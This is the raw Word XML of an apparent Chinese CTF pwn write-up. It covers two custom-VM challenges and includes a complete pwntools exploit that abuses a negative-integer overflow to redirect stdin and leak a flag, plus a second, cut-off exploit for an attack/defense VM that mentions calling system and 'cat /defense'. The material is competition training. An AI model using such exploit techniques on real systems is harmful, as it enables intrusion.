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5391A" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39F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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>粤湾中心</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C6A65" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39F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ongti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>检查题目保护，发现保护全开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE259F" w14:textId="335B3BB3" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39F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ongti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>通过IDA分析，得到以下自定义模拟指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'ADD':0xA0,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'DIV':0xB0,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'MUL':0xc0,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'SUB':0xD0,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'SHL':0xe0,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'SHR':0xf0,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'XOR':0x10,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'OR':0x20,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'AND':0x30,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'MOV':0x40,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'JMP':0x50,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'SHOW':0x60,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'PUSH':0x70,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'POP':0x80,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'MOV_TO_MEMORY':0x41,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>'MOV_MEMORY_TO_REGEX':0x42</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
        <w:t>3.然后在MOV_MEMORY_TO_REGEX和MOV_TO_MEMORY指令发</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现了负整数溢出，在模拟寄存器中放好负数，越界读取BSS段的stdin指针，通过以上两个指令实现修改BSS段上模拟ESP的指针为stdin+0x60的位置，题目的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>函数中将flag数据dup2到0x2333，通过模拟PUSH指令在stdin的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF164C">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>位置修改为0x2333，即可输出flag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FB" w:rsidRPr="00372828" w14:paraId="2F67C36C" w14:textId="77777777" w:rsidTr="00414E95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F562E4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gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>#!/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usr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/bin/python2.7  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1839909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 -*- coding: utf-8 -*-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736CB8E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from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import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFF9EF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context.log_level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"debug"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6583149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context.arch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 xml:space="preserve"> = "amd64"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BAE0E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elf = ELF("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RHVM.bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C526F7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lib = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118AB34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0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110B464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def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ip,port</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,debug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7893520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global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</w:p>
          <w:p w14:paraId="46BEC0A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global lib</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF1353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if(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>debug == 1):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2693261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process("./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RHVM.bin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7629398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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26904BC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remote(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ip,port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08B7EE6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opcode = {'ADD':0xA0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1342C35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'DIV':0xB0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034C77C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'MUL':0xc0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279B2C3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'SUB':0xD0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FAF7B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'SHL':0xe0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FD325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'SHR':0xf0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60821DA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'XOR':0x10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB8AA3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'OR':0x20,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1968022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'AND':0x30,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4627BFA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'MOV':0x40,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEF4A1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'JMP':0x50,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF9726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'SHOW':0x60,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FA789F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'PUSH':0x70,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59660A0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'POP':0x80,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A9A805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'MOV_TO_MEMORY':0x41,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="543A310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'MOV_MEMORY_TO_REGEX':0x42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5777551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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18096AF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time = 0.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C59645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def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code,x</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>1,x2):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C6C2D6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return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str(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(code &lt;&lt; 16) + (x1 &lt;&lt; 8) + x2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D17D98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codeList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[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4700366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(opcode['MOV'],0,0x5),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E34EA8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(opcode['MOV'],1,0x2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1561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(opcode['SHL'],0,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723E078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(opcode['MOV'],1,0),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B40D4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(opcode['SUB'],1,0),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266E360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(opcode['MOV'],0,0),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1BB78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(opcode['MOV_MEMORY_TO_REGEX'],0,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B5DBCF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(opcode['MOV'],2,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36265B3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(opcode['ADD'],1,2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78863BD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(opcode['MOV'],2,2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B3D39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(opcode['MOV_MEMORY_TO_REGEX'],2,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCA4D1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(opcode['MOV'],3,6),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FCF68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(opcode['MOV'],4,4),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="278B4EB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(opcode['SHL'],3,4),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2657DE6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(opcode['ADD'],0,3),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FC156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(opcode['MOV'],3,5),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48CDA6D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(opcode['MOV'],4,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1485AC0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(opcode['SHL'],3,4),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6725EF1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(opcode['ADD'],1,3),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3552686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(opcode['MOV_TO_MEMORY'],1,2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="357BF47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(opcode['SUB'],1,4),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5F144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(opcode['MOV_TO_MEMORY'],1,0),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9AFDA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(opcode['MOV'],0,4),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E02D41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(opcode['MOV'],1,3),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D8FC5C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(opcode['MOV'],2,3),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA274E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(opcode['SHL'],0,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266C6C9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(opcode['ADD'],0,2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="288E6AB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(opcode['MOV'],2,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AA0DF7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(opcode['SHL'],0,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A9FB8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(opcode['ADD'],0,2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C222F8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(opcode['MOV'],1,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4686E3B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(opcode['MOV'],2,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FDB36B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(opcode['SHL'],0,1),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57CE72F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(opcode['ADD'],0,2),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261CD32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(opcode['PUSH'],0,5),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ADC86A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(opcode['PUSH'],0,5),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3927BE6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(opcode['PUSH'],0,5),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C0D65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(opcode['PUSH'],0,0),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34EC1F7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]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61804A8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(":",'0')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11B9357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(":",'0')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094567E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(":",str(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len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codeList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AF056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(":")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="436FBC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3092F0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for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i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in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codeList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1014C26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i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' '</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0773551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payload[</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>0:len</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>(payload) - 1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E9350F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249684E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if(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>debug == 1):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D76468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log.success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pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>: " + str(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sh.pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D7D498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sh.interactive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4A7A32E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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D00B68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End"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>"127.0.0.1",8888,0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AC0C04E" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9E4169" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828" w:rsidRDefault="000C39FB" w:rsidP="000C39F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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>粤湾证券</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45402127" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828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检查题目保护，发现保护全开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48449E00" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828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lastRenderedPageBreak/>
        <w:t>通过IDA分析，得到以下自定义模拟指令</w:t>
      </w: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br/>
      </w:r>
      <w:proofErr w:type="spellStart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defense_opcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> = {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'BAN_CALL_ADDRESS':0x10,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'BAN_CALL_SYMBOL' :0x20,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'DEFENSE_BAN_STACK_MEMORY':0x40,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}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</w:r>
      <w:proofErr w:type="spellStart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attack_opcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> = {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'PUSH':0x10,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'POP':0x20,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'CALL_SYMBOL':0x40,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}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</w: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单个指令结构：</w:t>
      </w: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br/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 xml:space="preserve">typedef struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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AttackCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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{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unsigned long opcode;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 xml:space="preserve">char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[SYMBOL_NAME_SIZE];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unsigned long x1;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  <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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AttackCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="001027CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w: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同时攻击者发送的数据为base64数据，程序接受之后会解密并</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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memcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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到内存块中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E2EC2" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828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程序启动的时候读入defense文件，然后</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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memcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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到内存块中进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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解释器扫描，按照defense制订的规则对payload进行防御。若检测到payload带有攻击字符串，则直接清空这块指令，使得payload失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D048A44" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828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在防御方没有防御的情况下，最简单的方法就是直接执行system指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239189C" w14:textId="77777777" w:rsidR="000C39FB" w:rsidRPr="00372828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在防御者有防御的情况下被check，则会输出哪一条指令被defense规则检查，然后攻击方还要进一步加强自己的payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78261E17" w14:textId="76F2F42B" w:rsidR="000C39FB" w:rsidRPr="00EF164C" w:rsidRDefault="000C39FB" w:rsidP="000C39FB">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00372828">
        <w:rPr>
          <w:rFonts w:ascii="Songti TC" w:eastAsia="Songti TC" w:hAnsi="Songti TC" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果攻破靶机，可以通过cat /defense窃取别人的防守规则进行防御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FB" w:rsidRPr="00372828" w14:paraId="59A25F98" w14:textId="77777777" w:rsidTr="00414E95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="695D5C7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gramStart"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>#!/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usr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/bin/python2.7  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB0B0F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 -*- coding: utf-8 -*-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E820A5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from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import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD362D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import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518333D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context.log_level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"debug"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316863E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context.arch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 xml:space="preserve"> = "amd64"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CCD292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elf = ELF("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")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B0724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lib = 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1D78C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0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EAEE90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def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ip,port</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,debug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172E3B4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global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</w:p>
          <w:p w14:paraId="63A52AA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global lib</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5262E97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if(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>debug == 1):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A26F8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process(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")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9DD2A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lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA7427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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DAE659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remote(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ip,port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067C23D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lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63774AE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def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code,content</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Songti TC" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>,num</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001027CA">
              <w:rPr>
